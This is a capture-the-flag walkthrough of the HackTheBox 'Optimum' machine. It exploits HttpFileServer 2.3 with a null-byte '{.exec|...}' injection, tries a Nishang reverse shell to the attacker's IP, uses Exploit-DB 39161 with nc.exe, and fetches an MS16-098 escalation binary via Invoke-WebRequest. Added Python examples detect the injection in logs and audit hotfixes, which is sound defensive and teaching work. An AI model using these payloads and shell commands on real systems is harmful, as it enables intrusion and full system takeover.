HackTheBox - Optimum
Starting with a basic nmap scan: `nmap -sC -sV -Pn 10.10.10.8`
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-23 18:03 IST
Nmap scan report for 10.10.10.8
Host is up (0.25s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.09 seconds
We have an HTTP server (HttpFileServer 2.3) running on port 80.
Searching with searchsploit, we find that this version of the HTTP file server has a remote code execution vulnerability.
The file server is vulnerable because a request containing a null character (%00) followed by an HFS macro command ({.exec | anycommand.}) causes the command to be executed, which gives us remote code execution.
To check whether we really have RCE, we send a ping command through the search query:
%00 {.exec | ping 10.10.16.200. }
and we get the response back.
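From the defender's side, the request used above leaves a clear fingerprint: a null byte and an HFS macro opener ("{.") inside client-supplied input. The following Python is an added example for this writeup, not code from the original post, from HFS or from the exploit; it scans access-log lines in the common combined log format (constructed samples, not HFS's own log) and flags any request carrying a null byte or any HFS macro, not just exec, after URL-decoding twice so that double encoding such as %2500 is also caught.

```python
"""Flag HFS macro-injection attempts (the %00 {.exec ...} pattern used
above) in web-server access logs.

Added example for this writeup: not code from the original post, from HFS
or from the exploit. The log lines are constructed; the log format is the
common combined format, not HFS's own log format."""
import re
from urllib.parse import unquote

# Constructed sample access-log lines: two injection attempts, two benign
# requests (the last one contains braces but no HFS "{." macro opener).
SAMPLE_LOG = """\
10.10.16.200 - - [23/May/2021:18:10:01 +0000] "GET /?search=%00%7B.exec%7Cping+10.10.16.200.%7D HTTP/1.1" 200 512
10.10.14.5 - - [23/May/2021:18:11:07 +0000] "GET /?search=report.pdf HTTP/1.1" 200 1024
10.10.16.200 - - [23/May/2021:18:12:30 +0000] "GET /?search=%2500{.exec|cmd.} HTTP/1.1" 200 512
10.10.14.9 - - [23/May/2021:18:13:45 +0000] "GET /files/{notes}.txt HTTP/1.1" 404 210
"""

# Client IP, timestamp, method, request target and status from one log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# HFS macro syntax is {.name | args.}; exec is the one that runs commands,
# but any macro opener in client-supplied input is worth flagging, so the
# pattern captures the macro name rather than matching only "exec".
MACRO_RE = re.compile(r'\{\.\s*(?P<name>[a-z_]+)\b')


def classify_request(target: str) -> dict:
    """Decode the request target (twice, to catch double encoding such as
    %2500) and report whether it carries a null byte or an HFS macro."""
    decoded = unquote(unquote(target))
    macros = [m.lower() for m in MACRO_RE.findall(decoded)]
    null_byte = "\x00" in decoded
    return {
        "null_byte": null_byte,
        "macros": macros,
        "suspicious": null_byte or bool(macros),
    }


def scan_log(text: str) -> list:
    """Return one finding per suspicious request, with who/when/what."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        verdict = classify_request(m.group("target"))
        if verdict["suspicious"]:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "null_byte": verdict["null_byte"],
                "macros": verdict["macros"],
                "target": m.group("target"),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} macros={f['macros']} null_byte={f['null_byte']} {f['target']}")
```

Run against the constructed sample it reports the two requests from 10.10.16.200 and nothing for the two benign lines; on a real host, point scan_log at the reverse proxy or HFS access log and alert on any finding, since a null byte or a macro opener has no business in a file search.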
Now that we have remote code execution, we will try to get a reverse shell.
We are going to use the 'Invoke-PowerShellTcp.ps1' module from the Nishang toolkit to get the reverse shell, using Burp Suite to send the request that downloads Invoke-PowerShellTcp.ps1 onto the box.
Example:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.200 -Port 1234
I don't know why, but I'm not able to get the PowerShell script onto the box, so we are going to try another method.
We find an exploit on Exploit-DB:
https://www.exploit-db.com/exploits/39161
Now that we have the exploit, we have to make some modifications:
change the IP address and the port number, and set up a listener on our Kali machine.
For the exploit to work we also have to set up a Python web server on port 80 serving the nc.exe binary, and we have to run the exploit multiple times before it succeeds.
As we can see, we have received a shell, but only as a normal user; this is enough to get the user.txt flag.
Running systeminfo
we get:
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36
System Boot Time: 30/5/2021, 5:03:35
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.405 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.593 MB
Virtual Memory: In Use: 910 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \\OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Now, by transferring the winPEAS.exe binary to the box and running it, we can look for something we can use to escalate our privileges.
We see that the machine is vulnerable to Integer Overflow (MS16-098).
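The privilege escalation hinges on the hotfix list in the systeminfo output above: the box is missing the update for MS16-098. The Python below is an added example for this writeup, not code from the original post or from winPEAS; it parses a systeminfo dump into fields and a hotfix list, checks that the parsed count matches the declared "N Hotfix(s) Installed." count, and reports which required KBs are absent. SAMPLE_SYSTEMINFO is a trimmed, constructed copy in the format systeminfo prints, REQUIRED_KBS is a constructed list, and KB0000000 is a placeholder for the MS16-098 update (look up the real KB for the build you are auditing).

```python
"""Audit a `systeminfo` dump: parse the OS build and the installed hotfix
list and compare it with a list of updates that should be present.

Added example for this writeup, not code from the original post or from
winPEAS. SAMPLE_SYSTEMINFO is a trimmed, constructed copy in the format
systeminfo prints; REQUIRED_KBS is constructed, and KB0000000 is a
placeholder for the update that fixes MS16-098 (look up the real KB for
the build you are checking)."""
import re

SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Time Zone:                 (UTC+02:00) Athens, Bucharest
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2919355
                           [03]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
"""

# Constructed list; KB0000000 is a placeholder standing in for the MS16-098 update.
REQUIRED_KBS = ["KB2919355", "KB3014442", "KB0000000"]

FIELD_RE = re.compile(r'^(?P<key>[A-Za-z][^:]*?):\s*(?P<val>.*)$')
HOTFIX_RE = re.compile(r'^\s*\[\d+\]:\s*(KB\d+)\s*$', re.IGNORECASE)


def parse_systeminfo(text: str) -> dict:
    """Return top-level fields as a dict and the hotfix KBs as a list.
    Hotfix entries are only collected while inside the Hotfix(s) block, so
    numbered entries under other headings (NICs, IP addresses) are ignored.
    Works whether or not the continuation lines kept their indentation."""
    fields, hotfixes, in_hotfix_block = {}, [], False
    for line in text.splitlines():
        hm = HOTFIX_RE.match(line)
        if hm and in_hotfix_block:
            hotfixes.append(hm.group(1).upper())
            continue
        if line[:1].isspace():
            continue  # continuation line of some other multi-line field
        fm = FIELD_RE.match(line)
        if fm:
            key = fm.group("key").strip()
            fields[key] = fm.group("val").strip()
            in_hotfix_block = key.lower().startswith("hotfix")
    return {"fields": fields, "hotfixes": hotfixes}


def audit(text: str, required=REQUIRED_KBS) -> dict:
    """Cross-check declared vs. parsed hotfix count and list missing KBs."""
    info = parse_systeminfo(text)
    installed = set(info["hotfixes"])
    declared = re.match(r'\s*(\d+)', info["fields"].get("Hotfix(s)", ""))
    return {
        "host": info["fields"].get("Host Name"),
        "os": info["fields"].get("OS Name"),
        "build": info["fields"].get("OS Version"),
        "installed": len(installed),
        "count_consistent": bool(declared) and int(declared.group(1)) == len(installed),
        "missing": sorted(kb for kb in required if kb.upper() not in installed),
    }


if __name__ == "__main__":
    for k, v in audit(SAMPLE_SYSTEMINFO).items():
        print(f"{k}: {v}")
```

The count check matters on flattened output like the copy above: if extraction or a truncated terminal dropped hotfix lines, the declared count no longer matches and the "missing" list cannot be trusted. Feed the full systeminfo text from the box into audit() with the real required-KB list for the build to confirm the same gap winPEAS reports.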
We download the executable from GitHub, transfer it to the Windows machine using our Python web server, and run it:
powershell Invoke-WebRequest -Uri 'http://10.10.16.200/admin.exe' -OutFile admin.exe
And now we have successfully become NT AUTHORITY\SYSTEM.